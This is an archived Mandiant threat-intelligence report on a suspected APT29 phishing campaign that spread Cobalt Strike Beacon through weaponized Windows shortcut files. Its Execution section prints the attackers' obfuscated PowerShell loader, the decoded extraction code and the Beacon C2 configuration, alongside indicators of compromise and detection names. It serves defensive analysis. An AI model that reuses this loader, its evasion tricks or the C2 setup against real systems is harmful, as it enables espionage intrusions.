{ "id": "c8a22acc-6a25-4dc8-aaf8-8090e94b703f", "created_at": "2026-04-06T00:08:27.480685Z", "updated_at": "2026-04-10T03:37:16.73422Z", "deleted_at": null, "sha1_hash": "fb43ff546455506c41067543baf645a7b61a3fd8", "title": "Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1464704, "plain_text": "Not So Cozy: An Uncomfortable Examination of a Suspected APT29\r\nPhishing Campaign | Mandiant\r\nBy Mandiant\r\nPublished: 2018-11-19 · Archived: 2026-04-05 15:06:28 UTC\r\nWritten by: Matthew Dunwoody, Andrew Thompson, Ben Withnell, Jonathan Leathery, Michael Matonis, Nick Carr\r\nIntroduction\r\nFireEye devices detected intrusion attempts against multiple industries, including think tank, law enforcement,\r\nmedia, U.S. military, imagery, transportation, pharmaceutical, national government, and defense contracting.\r\nThe attempts involved a phishing email appearing to be from the U.S. Department of State with links to zip files\r\ncontaining malicious Windows shortcuts that delivered Cobalt Strike Beacon.\r\nShared technical artifacts; tactics, techniques, and procedures (TTPs); and targeting connect this activity to\r\npreviously observed activity suspected to be APT29.\r\nAPT29 is known to transition away from phishing implants within hours of initial compromise.\r\nOn November 14, 2018, FireEye detected new targeted phishing activity at more than 20 of our clients across multiple\r\nindustries.\r\n(UPDATE) This campaign has targeted over 20 FireEye customers across: Defense, Imagery, Law Enforcement,\r\nLocal Government, Media, Military, Pharmaceutical, Think Tank, Transportation, \u0026 US Public Sector industries in\r\nmultiple geographic regions.\r\nFireEye (@FireEye) November 15, 2018\r\nThe attacker appears to have compromised the email server of a hospital and the corporate website of a consulting company\r\nin order to use their infrastructure to send phishing emails. The phishing emails were made to look like secure\r\ncommunication from a Public Affairs official at the U.S. Department of State, hosted on a page made to look like another\r\nDepartment of State Public Affairs official's personal drive, and used a legitimate Department of State form as a decoy. This\r\ninformation could be obtained via publicly available data, and there is no indication that the Department of State network\r\nwas involved in this campaign. The attacker used unique links in each phishing email and the links that FireEye observed\r\nwere used to download a ZIP archive that contained a weaponized Windows shortcut file, launching both a benign decoy\r\ndocument and a Cobalt Strike Beacon backdoor, customized by the attacker to blend in with legitimate network traffic.\r\nSeveral elements from this campaign – including the resources invested in the phishing email and network infrastructure, the\r\nmetadata from the weaponized shortcut file payload, and the specific victim individuals and organizations targeted – are\r\ndirectly linked to the last observed APT29 phishing campaign from November 2016. This blog post explores those technical\r\nbreadcrumbs and the possible intentions of this activity.\r\nAttribution Challenges\r\nConclusive FireEye attribution is often obtained through our Mandiant consulting team's investigation of incidents at\r\ncompromised organizations, to identify details of the attack and post-compromise activity at victims. FireEye is still\r\nanalyzing this activity.\r\nThere are several similarities and technical overlaps between the 14 November 2018, phishing campaign and the suspected\r\nAPT29 phishing campaign on 9 November 2016, both of which occurred shortly after U.S. elections. However, the new\r\nhttps://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html\r\nPage 1 of 11\n\ncampaign included creative new elements as well as a seemingly deliberate reuse of old phishing tactics, techniques and\r\nprocedures (TTPs), including using the same system to weaponize a Windows shortcut (LNK) file. APT29 is a sophisticated\r\nactor, and while sophisticated actors are not infallible, seemingly blatant mistakes are cause for pause when considering\r\nhistorical uses of deception by Russian intelligence services. It has also been over a year since we have conclusively\r\nidentified APT29 activity, which raises questions about the timing and the similarities of the activity after such a long\r\ninterlude.\r\nNotable similarities between this and the 2016 campaign include the Windows shortcut metadata, targeted organizations and\r\nspecific individuals, phishing email construction, and the use of compromised infrastructure. Notable differences include the\r\nuse of Cobalt Strike, rather than custom malware; however, many espionage actors do use publicly and commercially\r\navailable frameworks for reasons such as plausible deniability.\r\nDuring the phishing campaign, there were indications that the site hosting the malware was selectively serving payloads. For\r\nexample, requests using incorrect HTTP headers reportedly served ZIP archives containing only the benign publicly\r\navailable Department of State form. It is possible that the threat actor served additional and different payloads depending on\r\nthe link visited; however, FireEye has only observed two: the benign and Cobalt Strike variations.\r\nWe provide details of this in the activity summary. Analysis of the campaign is ongoing, and we welcome any additional\r\ninformation from the community.\r\nActivity Summary\r\nThe threat actor crafted the phishing emails to masquerade as a U.S. Department of State Public Affairs official sharing an\r\nofficial document. The links led to a ZIP archive that contained a weaponized Windows shortcut file hosted on a likely\r\ncompromised legitimate domain, jmj[.].com. The shortcut file was crafted to execute a PowerShell command that read,\r\ndecoded, and executed additional code from within the shortcut file.\r\nUpon execution, the shortcut file dropped a benign, publicly available, U.S. Department of State form and Cobalt Strike\r\nBeacon. Cobalt Strike is a commercially available post-exploitation framework. The BEACON payload was configured with\r\na modified variation of the publicly available \"Pandora\" Malleable C2 Profile and used a command and control (C2) domain\r\n– pandorasong[.]com – assessed to be a masquerade of the Pandora music streaming service. The customization of the C2\r\nprofile may have been intended to defeat less resilient network detection methods dependent on the default configurations.\r\nThe shortcut metadata indicates it was built on the same or very similar system as the shortcut used in the November 2016\r\ncampaign. The decoy content is shown in Figure 1.\r\nhttps://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html\r\nPage 2 of 11\n\nFigure 1: Decoy document content\r\nSimilarities to Older Activity\r\nThis activity has TTP and targeting overlap with previous activity, suspected to be APT29. The malicious LNK used in the\r\nrecent spearphishing campaign, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), has technical overlaps with a\r\nsuspected APT29 LNK from November 2016, 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5:\r\nf713d5df826c6051e65f995e57d6817d), which was publicly reported by Volexity. The 2018 and 2016 LNK files are similar\r\nin structure and code, and contain significant metadata overlap, including the MAC address of the system on which the LNK\r\nwas created.\r\nAdditional overlap was observed in the targeting and tactics employed in the phishing campaigns responsible for distributing\r\nthese LNK file. Previous APT29 activity targeted some of the same recipients of this email campaign, and APT29 has\r\nleveraged large waves of emails in previous campaigns.\r\nOutlook and Implications\r\nhttps://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html\r\nPage 3 of 11\n\nAnalysis of this activity is ongoing, but if the APT29 attribution is strengthened, it would be the first activity uncovered\r\nfrom this sophisticated group in at least a year. Given the widespread nature of the targeting, organizations that have\r\npreviously been targeted by APT29 should take note of this activity. For network defenders, whether or not this activity was\r\nconducted by APT29 should be secondary to properly investigating the full scope of the intrusion, which is of critical\r\nimportance if the elusive and deceptive APT29 operators indeed had access to your environment.\r\nTechnical Details\r\nPhishing\r\nEmails were sent from DOSOneDriveNotifications-svCT-Mailboxe36625aaa85747214aa50342836a2315aaa36928202aa46271691a8255aaa15382822aa25821925a0245@northshorehealthgm[\r\nwith the subject Stevenson, Susan N shared \"TP18-DS7002 (UNCLASSIFIED)\" with you. The distribution of emails varied\r\nsignificantly between the affected organizations. While most targeted FireEye customers received three or fewer emails,\r\nsome received significantly more, with one customer receiving 136.\r\nEach phishing email contained a unique malicious URL, likely for tracking victim clicks. The pattern of this URL is shown\r\nin Figure 2.\r\nFigure 2: Malicious URL structure\r\nOutside of the length of the sender email address, which may have been truncated on some recipient email clients, the\r\nattacker made little effort to hide the true source of the emails, including that they were not actually sent from the\r\nDepartment of State. Figure 3 provides a redacted snapshot of email headers from the phishing message.\r\nFigure 3: Redacted email headers\r\nhttps://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html\r\nPage 4 of 11\n\nThe malicious links are known to have served two variants of the file ds7002.zip. The first variant (MD5:\r\n3fccf531ff0ae6fedd7c586774b17a2d), contained ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c). ds7002.lnk was\r\na malicious shortcut (LNK) file that contained an embedded BEACON DLL and decoy PDF, and was crafted to launch a\r\nPowerShell command. On execution, the PowerShell command extracted and executed the Cobalt Strike BEACON\r\nbackdoor and decoy PDF. The other observed variant of ds7002.zip (MD5: 658c6fe38f95995fa8dc8f6cfe41df7b) contained\r\nonly the benign decoy document. The decoy document ds7002.pdf (MD5: 313f4808aa2a2073005d219bc68971cd) appears\r\nto have been downloaded from hxxps://eforms.state.gov/Forms/ds7002.PDF.\r\nThe BEACON backdoor communicated with the C2 domain pandorasong[.]com (95.216.59[.]92). The domain leveraged\r\nprivacy protection, but had a start of authority (SOA) record containing vleger@tutanota.com.\r\nOur analysis indicates that the attacker started configuring infrastructure approximately 30 days prior to the attack. This is a\r\nsignificantly longer delay than many other attackers we track. Table 1 contains a timeline of this activity.\r\nTime Event Source\r\n2018-10-15 15:35:19Z pandorasong[.]com registered Registrant Information\r\n2018-10-15 17:39:00Z pandorasong[.]com SSL certificate established Certificate Transparency\r\n2018-10-15 18:52:06Z Cobalt Strike server established Scan Data\r\n2018-11-02 10:25:58Z LNK Weaponized LNK Metadata\r\n2018-11-13 17:58:41Z 3fccf531ff0ae6fedd7c586774b17a2d modified Archive Metadata\r\n2018-11-14 01:48:34Z 658c6fe38f95995fa8dc8f6cfe41df7b modified Archive Metadata\r\n2018-11-14 08:23:10Z First observed phishing e-mail sent Telemetry\r\nTable 1: Operational timeline\r\nExecution\r\nUpon execution of the malicious LNK, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), the following PowerShell\r\ncommand was executed:\r\n\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -noni -ep bypass\r\n$zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5\r\nrIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0ZW0gLVBhdGggJE\r\nVudjp0ZW1wIC1GaWx0ZXIgJHRiIC1SZWN1cnNlO2lmICgtbm90ICRvZSkge2V4aXR9W\r\n0lPLkRpcmVjdG9yeV06OlNldEN1cnJlbnREaXJlY3RvcnkoJG9lLkRpcmVjdG9yeU5hbWUp\r\nO30kdnp2aT1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJHRiLCdPcGVuJywnUmVhZCcsJ\r\n1JlYWRXcml0ZSc7JG9lPU5ldy1PYmplY3QgYnl0ZVtdKCR2Y3EtJHB0Z3QpOyRyPSR2en\r\nZpLlNlZWsoJHB0Z3QsW0lPLlNlZWtPcmlnaW5dOjpCZWdpbik7JHI9JHZ6dmkuUmVhZC\r\ngkb2UsMCwkdmNxLSRwdGd0KTskb2U9W0NvbnZlcnRdOjpGcm9tQmFzZTY0Q2hhckFy\r\ncmF5KCRvZSwwLCRvZS5MZW5ndGgpOyR6az1bVGV4dC5FbmNvZGluZ106OkFTQ0lJL\r\nkdldFN0cmluZygkb2UpO2lleCAkems7';$fz='FromBase'+0x40+'String';$rhia=[Text.E\r\nncoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;\r\nThis command included some specific obfuscation, which may indicate attempts to bypass specific detection logic. For\r\nexample, the use of 'FromBase'+0x40+'String', in place of FromBase64String, the PowerShell command used to decode\r\nbase64.\r\nhttps://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html\r\nPage 5 of 11\n\nThe decoded command consisted of additional PowerShell that read the content of ds7002.lnk from offset 0x5e2be to offset\r\n0x623b6, base64 decoded the extracted content, and executed it as additional PowerShell content. The embedded\r\nPowerShell code decoded to the following:\r\n$ptgt=0x0005e2be;\r\n$vcq=0x000623b6;\r\n$tb=\"ds7002.lnk\";\r\nif (-not(Test-Path $tb))\r\n{\r\n$oe=Get-ChildItem -Path $Env:temp -Filter $tb -Recurse;\r\nif (-not $oe)\r\n{\r\nexit\r\n}\r\n[IO.Directory]::SetCurrentDirectory($oe.DirectoryName);\r\n}\r\n$vzvi=New-Object IO.FileStream $tb,'Open','Read','ReadWrite';\r\n$oe=New-Object byte[]($vcq-$ptgt);\r\n$r=$vzvi.Seek($ptgt,[IO.SeekOrigin]::Begin);\r\n$r=$vzvi.Read($oe,0,$vcq-$ptgt);\r\n$oe=[Convert]::FromBase64CharArray($oe,0,$oe.Length);\r\n$zk=[Text.Encoding]::ASCII.GetString($oe);\r\niex $zk;\r\nWhen the decoded PowerShell is compared to the older 2016 PowerShell embedded loader (Figure 4), it's clear that\r\nsimilarities still exist. However, the new activity leverages randomized variable and function names, as well as obfuscating\r\nstrings contained in the script.\r\nFigure 4: Shared functions to loader in older activity (XOR decode function and CopyFilePart)\r\nThe PowerShell loader code is obfuscated, but a short de-obfuscated snippet is shown as follows. The decoy PDF and\r\nBEACON loader DLL are read from specific offsets within the LNK, decoded, and their contents executed. The BEACON\r\nloader DLL is executed with the export function \"PointFunctionCall\":\r\nhttps://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html\r\nPage 6 of 11\n\n[TRUNCATED]\r\n$jzffhy = [IO.FileAccess]::READ\r\n$gibisec = myayxvj $(\"ds7002.lnk\")\r\n$oufgke = 0x48bd8\r\n$wabxu = 0x5e2be - $oufgke\r\n$lblij = bygtqi $gibisec $oufgke $wabxu $(\"%TEMP%\\ds7002.PDF\") Invoke-Item\r\n$((lylyvve @((7,(30 + 0x34 - 3),65,(84 - 5),(-38 + 112),(-16 + 0x25 + 52))) 35))\r\n$oufgke = 0x0dd8\r\n$wabxu = 0x48bd8 - $oufgke\r\n$yhcgpw = bygtqi $gibisec $oufgke $wabxu $(\"%LOCALAPPDATA%\\cyzfc.dat\") if\r\n($ENV:PROCESSOR_ARCHITECTURE -eq $(\"AMD64\")) { \u0026 ($(\"rundll32.exe\")) $(\",\")\r\n$(\"PointFunctionCall\") }\r\nFiles Dropped\r\nUpon successful execution of the LNK file, it dropped the following files to the victim's system:\r\n%APPDATA%\\Local\\cyzfc.dat (MD5: 16bbc967a8b6a365871a05c74a4f345b)\r\nBEACON loader DLL\r\n%TEMP%\\ds7002.PDF (MD5: 313f4808aa2a2073005d219bc68971cd)\r\nDecoy document\r\nThe dropped BEACON loader DLL was executed by RunDll32.exe using the export function \"PointFunctionCall\":\r\n\"C:\\Windows\\system32\\rundll32.exe\"\r\nC:\\Users\\Administrator\\AppData\\Local\\cyzfc.dat, PointFunctionCall\r\nThe BEACON payload included the following configuration:\r\nauthorization_id: 0x311168c\r\ndns_sleep: 0\r\nhttp_headers_c2_post_req:\r\nAccept: */*\r\nContent-Type: text/xml\r\nX-Requested-With: XMLHttpRequest\r\nHost: pandorasong.com\r\nhttp_headers_c2_request:\r\nAccept: */*\r\nGetContentFeatures.DLNA.ORG: 1\r\nHost: pandorasong[.]com\r\nCookie: __utma=310066733.2884534440.1433201462.1403204372.1385202498.7;\r\njitter: 17\r\nnamed_pipes: \\\\\\\\%s\\\\pipe\\\\msagent_%x\r\nprocess_inject_targets:\r\n%windir%\\\\syswow64\\\\rundll32.exe\r\n%windir%\\\\sysnative\\\\rundll32.exe\r\nbeacon_interval: 300\r\nc2:\r\nconntype: SSL\r\nhost: pandorasong[.]com\r\nport: 443\r\nc2_urls:\r\npandorasong[.]com/radio/xmlrpc/v45\r\nhttps://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html\r\nPage 7 of 11\n\npandorasong[.]com/access/\r\nc2_user_agents: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nNetwork Communications\r\nAfter successful installation/initialization of the malware, it made the following callback to the C2 server\r\npandorasong[.]com via TCP/443 SSL. The sample was configured to use a malleable C2 profile for its network\r\ncommunications. The specific profile used appears to be a modified version of the publicly available Pandora C2 profile.\r\nThe profile may have been changed to bypass common detections for the publicly available malleable profiles. The\r\nfollowing is a sample GET request:\r\nGET /access/?version=4\u0026lid=1582502724\u0026token=ajlomeomnmeapoagcknffjaehikhmpep\r\nBdhmoefmcnoiohgkkaabfoncfninglnlbmnaahmhjjfnopdapdaholmanofaoodkiokobenhjd\r\nMjcmoagoimbahnlbdelchkffojeobfmnemdcoibocjgnjdkkbfeinlbnflaeiplendldlbhnhjmbg\r\nagigjniphmemcbhmaibmfibjekfcimjlhnlamhicakfmcpljaeljhcpbmgblgnappmkpbcko\r\nHTTP/1.1\r\nAccept: */*\r\nGetContentFeatures.DLNA.ORG: 1\r\nHost: pandorasong.com\r\nCookie: __utma=310066733.2884534440.1433201462.1403204372.1385202498.7;\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like\r\nGecko\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nSimilarities to Older Activity\r\nFigure 5 and Figure 6 show the overlapping characteristics between the LNK used in the recent spear phish emails,\r\nds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), compared to a suspected APT29 LNK from the November 2016\r\nattack that led to the SPIKERUSH backdoor, 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5:\r\nf713d5df826c6051e65f995e57d6817d).\r\nFigure 5: LNK characteristics: new activity (left) and old activity (right)\r\nhttps://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html\r\nPage 8 of 11\n\nFigure 6: LNK characteristics: new activity (left) and old activity (right)\r\nIn addition to similar LNK characteristics, the PowerShell command is very similar to the code from the older sample that\r\nexecuted the SPIKERUSH backdoor. Some of the same variable names are retained in this new version, as seen in Figure 7\r\nand Figure 8.\r\nFigure 7: Embedded PowerShell: new activity (left) and old activity (right)\r\nhttps://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html\r\nPage 9 of 11\n\nFigure 8: Shared string obfuscation logic: new LNK activity (left) and old VERNALDROP activity (right)\r\nIndicators\r\nIndicator Description\r\ndosonedrivenotifications-svct-mailboxe36625aaa85747214aa50342836a2315aaa36\r\n928202aa46271691a8255aaa15382822aa25821925a\r\n0245@northshorehealthgm[.]org\r\nPhishing email address from likely\r\ncompromised legitimate server\r\nStevenson, Susan N shared \"TP18-DS7002 (UNCLASSIFIED)\" with\r\nyou\r\nPhishing email subject\r\nhttps://www.jmj[.]com/personal/nauerthn_state_gov/*\r\nMalware hosting location on likely\r\ncompromised legitimate domain\r\npandorasong[.]com BEACON C2\r\n95.216.59[.]92 Resolution of pandorasong[.]com\r\n2b13b244aafe1ecace61ea1119a1b2ee SSL certificate for pandorasong[.]com\r\n3fccf531ff0ae6fedd7c586774b17a2d Malicious ZIP archive MD5\r\n658c6fe38f95995fa8dc8f6cfe41df7b Benign ZIP archive MD5\r\n6ed0020b0851fb71d5b0076f4ee95f3c Malicious LNK file MD5\r\n313f4808aa2a2073005d219bc68971cd Benign decoy PDF MD5\r\n16bbc967a8b6a365871a05c74a4f345b BEACON DLL MD5\r\n%APPDATA%\\Local\\cyzfc.dat BEACON DLL file path\r\n%TEMP%\\ds7002.PDF Benign decoy PDF file path\r\nhttps://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html\r\nPage 10 of 11\n\nTable 2: Indicators\r\nRelated Samples\r\n37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d)\r\nFireEye Detection\r\nFireEye detected this activity across our platform. Table 3 contains the specific detection names that applied to this activity.\r\nProduct Detection names\r\nNetwork Security\r\nMalware.Archive\r\nMalware.Binary.lnk\r\nSuspicious.Backdoor.Beacon\r\nEndpoint Security\r\nSUSPICIOUS POWERSHELL USAGE (METHODOLOGY)\r\nGeneric.mg.16bbc967a8b6a365\r\nThreat Analytics Platform\r\nWINDOWS METHODOLOGY [PowerShell Base64 String]\r\nWINDOWS METHODOLOGY [Rundll32 Roaming]\r\nWINDOWS METHODOLOGY [PowerShell Script Block Warning]\r\nWINDOWS METHODOLOGY [Base64 Char Args]\r\nTADPOLE DOWNLOADER [Rundll Args]\r\nINTEL HIT - IP [Structured Threat Reputation-Based]\r\nINTEL HIT - FQDN [Structured Threat Reputation-Based] [DNS]\r\nINTEL HIT - FQDN [Structured Threat Reputation-Based] [Non-DNS]\r\nINTEL HIT - FILE HASH [Structured Threat Reputation-Based]\r\nTable 3: FireEye product detections\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html\r\nhttps://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MITRE", "Malpedia" ], "references": [ "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html" ], "report_names": [ "not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434107, "ts_updated_at": 1775792236, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/fb43ff546455506c41067543baf645a7b61a3fd8.pdf", "text": "https://archive.orkl.eu/fb43ff546455506c41067543baf645a7b61a3fd8.txt", "img": "https://archive.orkl.eu/fb43ff546455506c41067543baf645a7b61a3fd8.jpg" } }